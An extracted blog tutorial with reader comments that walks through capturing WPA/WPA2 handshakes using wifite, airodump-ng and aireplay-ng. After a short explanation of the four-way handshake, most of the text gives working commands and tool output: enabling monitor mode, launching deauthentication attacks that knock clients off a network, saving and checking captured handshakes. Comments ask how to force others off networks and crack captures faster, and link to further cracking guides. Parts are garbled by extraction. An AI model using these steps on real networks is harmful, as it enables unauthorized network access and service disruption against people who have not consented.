27/9/2016
Home
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
Install Kali
Hack With Kali
Hack WPA/WPA2 PSK Capturing the Handshake
By Shashwat Chaudhary June 13, 2014 aircrack-ng, aireplay-ng, airodump-ng, hacking, tutorial, wifi, wifite, wireless
hacking tutorials, wpa, wpa2
WPA password hacking
Okay, so hacking WPA-2 PSK involves 2 main steps-
Night Mode
Night mode (Still in beta, Will need to refresh page
to get back to day mode, seems to work only in
chrome)
Search This Blog
1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
2. Cracking the hash.
Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the
wireless network, and the wireless access point. What happens is when the client and access point
Popular Posts
communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This
handshake has the hash of the password. Now there's no direct way of getting the password out of the
hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all
Tutorial on Hacking With Kali Linux
Hack WPA/WPA2 WPS - Reaver - Kali Linux
possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with
the one that's there in the handshake. Now if the hashes match, we know what plain text password gave
rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its
Wifi Hacking - WEP - Kali Linux Aircrack-ng suite
Evil Twin Tutorial
because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking
process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot,
we shall first look at the process of capturing a handshake. We will also see what problems one can face
Hacking Website with Sqlmap in Kali Linux
Penetration Testing - Hacking XP
during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on
what a 4-way handshake really is (you don't want to become a script kiddie do you?)
Wifite : Hacking Wifi The Easy Way : Kali Linux
Hack WPA/WPA2 PSK Capturing the Handshake
The Four-Way Handshake
The authentication process leaves two considerations: the access point (AP) still needs to authenticate
Kali Linux 1.1.0 Released
Hack Facebook Account : Stuff You Should Know
itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP
exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is,
however, designed to last the entire session and should be exposed as little as possible. Therefore the
Follow By Email
four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is
generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP
Emailaddress...
MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic
hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic.
Facebook
The actual messages exchanged during the handshake are depicted in the figure and explained below:
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
1/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
KaliTutorials
4754Megusta
Megustaestapgina
Usaraplicacin
Selprimerodetusamigosenindicarquetegusta
esto.
KaliTutorials
Ayeralas4:22
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct
the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including
authentication, which is really a Message Authentication and Integrity Code: (MAIC).
Useveilevasiontohelpyourpayloads
bypassantivirussoftware.
http://www.kalitutorials.net//antivirus
evasionbypassing
3. The AP sends the GTK and a sequence number together with another MIC. This sequence number
will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic
replay detection.
4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key 64 bytes)
Advertisement
1. 16 bytes of EAPOL-Key Confirmation Key (KCK) Used to compute MIC on WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the
'Key Data' field) to the client (for example, the RSN IE or the GTK)
3. 16 bytes of Temporal Key (TK) Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key Used to compute MIC on unicast data packets
transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key Used to compute MIC on unicast data packets
transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is
using TKIP to encrypt the data.
By the way, if you didn't understand much of it then don't worry. There's a reason why people don't
search for hacking tutorials on Wikipedia (half the stuff goes above the head)
Author
Capturing The Handshake
Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by
one1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)
Wifite
Methodology
Shashwat Chaudhary
google.com/+ShashwatChau
udhary
2nd year CSE @ IIIT Delhi
Follow
829 followers
We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs
to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up
and connects to the WPA network, or you can force the already connected clients to disconnect, and
when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will
(such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating
them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection
Contact
You can write to us at admin@kalitutorials.net
request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
2/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close
to the access point (router) and the clients as possible. Now the methodology is same for wifite and
airodump-ng method, but wifite does all this crap for you, and in case of airodump-ng, you'll have to call a
brethren (airreply-ng) to your rescue. Okay enough theory.
Get the handshake with wifite
Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me'
protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can
do.
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ----- 1 me 1 WPA2 57db wps
2 ******* 11 WEP 21db no client
3 ************** 11 WEP 21db no
Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to
attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble.
Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We
have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has
WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the PIN
guessing attack. It has almost 100% success rate, and would have given us the password had I waited for
2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then
pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
3/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
[+] disabling monitor mode on mon0... done
[+] quitting
Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will deauthenticate it, and it'll try to connect again. Lets see what happens this time around.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ----- 1 * 1 WPA 99db no client
2 me 1 WPA2 47db wps client
3 * 11 WEP 22db no clients
4 * 11 WEP 20db no
[+] select target numbers (1-4) separated by commas, or 'all': 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:51] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~#wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does
not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
[+] scanning for wireless devices...
[+] available wireless devices:
1. wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
2. wlan0 Atheros ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):
See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
4/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ----- 1 me 1 WPA2 44db wps client
2 * 11 WEP 16db no client
3 * 11 WEP 16db no
[+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:23] listening for handshake...
[0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0... done
[+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every
10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the
handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack,
pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the
same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a
perfect ride, all the problems were seen in wifite case.
Capturing Handshake with Airodump-ng
Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty
quick, as the wifite thing was quite detailed. I'm copying stuff from
http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If
you are not a newbie, skip to the point where you see root@kali in red)
1.Findoutthenameofyourwirelessadapter.
Alright,now,yourcomputerhasmanynetworkadapters,sotoscanone,you
needtoknowitsname.Sotherearebasicallythefollowingthingsthatyou
needtoknow
loloopback.Notimportantcurrently.
ethethernet
wlanThisiswhatwewant.Notethesuffixassociated.
Now,toseealltheadapters,typeifconfigonaterminal.Seetheresult.
Notedownthewlan(0/1/2)adapter.
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
5/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
Troublewiththewlaninterfacenotshowingup.Thisisbecausevirtual
machinescan'tuseinternalwirelesscardsandyouwillhavetouse
externalcards.YoushouldtrybootingKaliusingLiveUSB(justlookat
thefirstpartofthistutorial),orbuyanexternalcard.
2.EnableMonitormode
Monitormode
Now,weuseatoolcalledairmonngtocreateavirtualinterfacecalled
mon.Justtype
airmonngstartwlan0
Yourmon0interfacewillbecreated.
3.Startcapturingpackets
Now,we'lluseairodumpngtocapturethepacketsintheair.Thistool
gathersdatafromthewirelesspacketsintheair.You'llseethenameof
thewifiyouwanttohack.
airodumpngmon0
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
6/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
4.Storethecapturedpacketsinafile
Thiscanbeachievedbygivingsomemoreparameterswiththeairodump
command
airodumpngmon0writename_of_file
Non newbies root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere
Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack
with aireplay-ng
root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0
The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run
it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target
BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with
beacon frame, then fix mon0 on a channel usingroot@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
7/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug
with aircrack-ng suite).
Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake
captured . Here is what it looks like
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:73:8D:37:A7:ED -47 75 201 35 0 1 54e WPA2 CCMP PSK me
BSSID STATION PWR Rate Lost Frames Probe
* * 0 0e- 1 742 82 me
* * -35 0e- 1 0 26
You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
# BSSID ESSID Encryption
1 ************** me WPA (1 handshake)
2 ** Unknown
Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it
helped you. The next tutorial, if you need it, is about cracking the captured handshake. Good luck.
Share with your friends
24
Sponsored
Related Post
Real Life Phishing Scenario : Zero
So You Want To Be A Hacker
...
Hack Any Android Phone :
msfvenon -...
NEXT
So You Want To Be A Hacker
PREVIOUS
Add new exploits to Metasploit from Exploit-db
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
8/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
Posted by Shashwat Chaudhary at June 13, 2014
38 comments:
1.
Anonymous
June 14, 2014 at 3:20 PM
I'm visiting your site for the first time, and I found this to be a very good tutorial. Good job for all
the explanation, and giving hints on what else to look up on Wikipedia/Google to gain a greater
understanding. Keep up the great work as I go through your other posts! Thank you. -Student
Reply
1.
Shashwat Chaudhary
1.1
June 14, 2014 at 10:02 PM
Thanks for the appreciation. Keeps me motivated and helps me write better
tutorials.
2.
sudharsan viswa
January 10, 2015 at 8:28 AM
Hello shashwat, How can i increase my cracking speed using my NVIDIA graphic card
1.
Shashwat Chaudhary
Reply
2.1
October 6, 2015 at 11:15 AM
I am writing a tutorial on this soon... I have been busy for the year but now I have
time at hand.
2.
Anonymous
June 10, 2016 at 5:08 AM
2.2
hashcat can do this, here is a tutorial on that:
https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcatkali-linux/
3.
Enjoy Life
February 17, 2015 at 1:58 AM
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
9/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
keep writing !
very good articles !
4.
Reply
hardwaired
May 4, 2015 at 12:42 PM
It was such a brilliant approach. I would like to know how to convert .cap to .hccap and cracking it
with pyrit, aircrack-ng and hashcat without dictionary or password list?
Reply
1.
Anonymous
June 10, 2016 at 5:11 AM
4.1
look at those two sites:
1. https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcatkali-linux/
2. https://www.blackmoreops.com/2014/03/10/cracking-wifi-wpawpa2-passwordsusing-pyrit-cowpatty/
There is a good explanation. This approach uses neither wordlists nor brute force,
but i haven't really read it yet, so I don't know how effective it is:
http://null-byte.wonderhowto.com/forum/kali-linux-rolling-2-0-fluxion-crack-wpawpa2-wifi-password-without-dictionary-brute-fore-attack-0170864/
5.
Mushtaq Khan
May 7, 2015 at 9:57 PM
[#] Drone Hijacking With Maldrone Drone Malware
http://beinghaxor.blogspot.com/2015/05/drone-hijacking-with-maldrone-drone.html
6.
Anonymous
May 31, 2015 at 4:07 PM
Thank You. These tutorials are Great. Keep writing.
7.
Anonymous
June 5, 2015 at 7:41 PM
You had it well explained but since you used the aircrack suite
1-You should disclose where the caphs-01cap is stored
2-show the command for the use of aircrack to crack the password
3-Or disclose other program run to do the final crack
8.
Reply
6
Reply
7
Reply
Anonymous
June 8, 2015 at 4:51 PM
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
10/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
I just want to say that this is a very good tutorial :)
9.
Reply
Bhole baba
August 16, 2015 at 9:16 AM
Very good tutorial...keep it up bro.
10.
Jay Mee
August 22, 2015 at 7:25 AM
Reply
10
I found this page by searching success/ttl as i wanted to find out what ttl stood for? isit time to live?
or what?
Reply
1.
Anonymous
September 3, 2015 at 8:41 PM
10.1
"Time to live" haha. It means "total"
11.
Anonymous
11
October 11, 2015 at 3:25 PM
Does using Live USB enable the internal wireless card enable it to inject packets easier to establish
the handshakes or does the computer/laptop need to have an external wireless card to inject
packets to get the handshake, regardless of using the Live USB?
Reply
1.
Anonymous
June 10, 2016 at 5:04 AM
11.1
depends. But in nearly all cases, an external card is better than the internal one
(especially in regard on performance an compatibility) an only costs like 15$, so
it's worth a try
12.
Anonymous
December 18, 2015 at 10:04 AM
12
everything is good Except Capturing that handshaking packet.. .. the problem is .. it takes too much
time to capture that packet..!! is there any way to do it fast?
Reply
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
11/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
1.
Anonymous
12.1
June 10, 2016 at 5:01 AM
normally, it should only take seconds. If it takes a long time, there might be
something wrong. If your using wifite, there is a bug I explained in reply to a
comment from May 25, 2016 at 11:34 PM, just look down the page
13.
Unknown
13
December 30, 2015 at 3:06 AM
Everytime i use airodump no devices show up underneath BSSID, i have installed a wireless card as
i am running kali linux on a virtual machine. Is there a way to fix this as i know there are devices on
my network, and another network i am running using a wireless receiver. I just used wifite to see if
anything different would happen and nothing. The other day i left airodump on for 6 hours scanning
and nothing appeared. Any ideas on what to do?
Reply
1.
Shashwat Chaudhary
January 1, 2016 at 2:47 AM
13.1
There could be some issues with channel hopping. Try and set channels manually
to 1,6,11 and see if anything shows up.
2.
Anonymous
June 10, 2016 at 4:58 AM
13.2
Try ifconfig and see if your wifi-card shows up. If it doesn't, it's maybe
incompatible
14.
Anonymous
January 24, 2016 at 7:49 PM
very nice man best one iv seen and iv been looking at this kind of stuff for 8 years
15.
Anonymous
February 4, 2016 at 8:36 AM
14
Reply
15
I was testing on my own network, i got the handshake with # wifite -mac -aircrack -dict
For some reason wifite wont find the wordlist file... ok, then i did # aircrack-ng <.cap> -w (also tried
the -a 2 option)
but it just wont pick the password... There is just one entery (9 carecters) and it just says that the
password isnt in the wordlist... I even tried Crunch with given letters and let it do its thing for like
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
12/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
13 minutes and im sure it passed the correct one and still it wont pick it up... is there something
wrong with the handshake file?
Reply
16.
Unknown
16
April 19, 2016 at 10:45 PM
Hi ,SHASHWAT CHAUDHARY
As you said, "you can force the already connected clients to disconnect".
How can i do that? thanks.
1.
Shashwat Chaudhary
Reply
April 24, 2016 at 4:17 AM
16.1
Search on google for the term Deauthentication (add wireless hacking to get more
specific results).
2.
Anonymous
June 10, 2016 at 4:55 AM
16.2
Also, wifite does that automatically after selecting the network. Or you can do it
manually with aireplay:
aireplay-ng deauth 0 -a BSSID CARD
(replace BSSID and CARD with the one that you use)
17.
NALIN
May 18, 2016 at 2:52 PM
17
Wifite not able to capture any handshake....
Can you help me with it ??
also i need to talk to you...
Please leave a comment how can I connect to you ?
1.
Anonymous
June 10, 2016 at 4:39 AM
Reply
17.1
In General
> Contact Us,
the
following mailadress
is
given:
admin@kalitutorials.net
In the new version of Kali (2.0) wich you are most likely using, Wifite has a bug
because of wich capturing the handshake fails. In the newest version of wifite this
is fixed, but in Kali, the update-function of Wifite (wifite --update i think) won't
find the newest version. Solutions are shown on this site for example:
http://www.rootsh3ll.com/2015/10/rwsps-automated-wifi-wep-wpa2-wpscracking-ch4/ . You will basically just have to update manually.
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
13/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
18.
Anonymous
May 25, 2016 at 11:34 PM
18
is there a way for us to decrypt the captured file from our handshake? well dictionary attacks are not
that good not unless you have all the combinations of ASCII words in one list or so, Crunch will eat
your box's resources if we will use it for that kind of attack as well.
Is it possible?
Reply
1.
Anonymous
June 10, 2016 at 4:50 AM
18.1
I
recommend
to
read
this
article
about
hashcat:
https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcatkali-linux/
and
this
one
about
Pyrite
and
Cowpatty:
https://www.blackmoreops.com/2014/03/10/cracking-wifi-wpawpa2-passwordsusing-pyrit-cowpatty/.
They are both really good written and can save you some time when it comes to
decrypting.
But
what
you
might
have
thought
of
is
this:
http://nullbyte.wonderhowto.com/forum/kali-linux-rolling-2-0-fluxion-crack-wpa-wpa2-wifipassword-without-dictionary-brute-fore-attack-0170864/
It's author claims to crack the password without brute force/Dictionary. I haven't
really looked at it yet, so no guarantee this works.
19.
Aman Kumar
June 9, 2016 at 11:19 PM
19
Cracking wifi using aircrack-ng.
https://codeminds.org/2016/06/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng.html
20.
Jay Patel
June 17, 2016 at 12:08 AM
some time wpa hanshake not found so how to solve this problems
21.
Unknown
July 9, 2016 at 10:38 AM
Reply
20
Reply
21
This site is amazing. However, i've installed kali linux on the hard-drive of a windows vista machine.
The wireless adapter is a broadcom bcm4311 802.11b/g. I've used both wifite and airmonng/airreplay-ng and on both, i watch my other machine (a chromebook) disconnect due to the
deauth broadcast. But when it reconnects right away, neither airmon nor wifite capture the
handshake. I've got all three devices (2 computers and router) in the same room. Could there be a
setting i'm missing? Or maybe my Wireless Adapter isnt compatible? What could be the issue
here? There's no error it just keeps cycling trying to deauthenticate and capture the handshake.
Reply
1.
Anonymous
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
14/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
July 9, 2016 at 10:46 AM
21.1
Little more information: When i use the command airmon-ng start wlan0 to start
the monitoring interface, it shows the interface, says the driver is b43, and under
chipset, it says "non-mac80211 device? (report this!). Idk if that has anything to
do with it?
22.
Narella Medlock
22
July 17, 2016 at 6:16 AM
Thanks for the Tutorial here's an simple one
Cracking WPA2 wifi password using aircrack-ng Kali linux
23.
an other note
Reply
23
August 25, 2016 at 8:46 AM
i already got handshake, and capturing key from fake ap. but in Wifi Information : bash:
/tmp/TMPflux/handcheck: Permission denied
i tried to input (the right key of wifi that i attacked) from 192.168.1.1 in my browser, but the key not
shown for final KEY FOUND by fluxion. as i did first time.
anyone can help?
thanks for answer
1.
Reply
Shashwat Chaudhary
August 25, 2016 at 9:10 AM
23.1
I don't know why you have written a comment about Fluxion here. Anyways, I'm
not able to understand exactly what is going on, so could you follow the steps
that I have shown in the Fluxion tutorial, and then tell exactly where you are
facing issues (and comment on that post itself, not here).
Enteryourcomment...
Commentas:
Publish
Unknown(Google)
Preview
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
Signout
Notifyme
15/16
�27/9/2016
HackWPA/WPA2PSKCapturingtheHandshakeKaliLinuxHackingTutorials
Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this sites author and/or owner is strictly prohibited. Excerpts
and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5a LqJcMW7zznffTx Qwta 8JTZsx BDPguC
http://www.kalitutorials.net/2014/06/hackwpa2pskcapturinghandshake.html
16/16
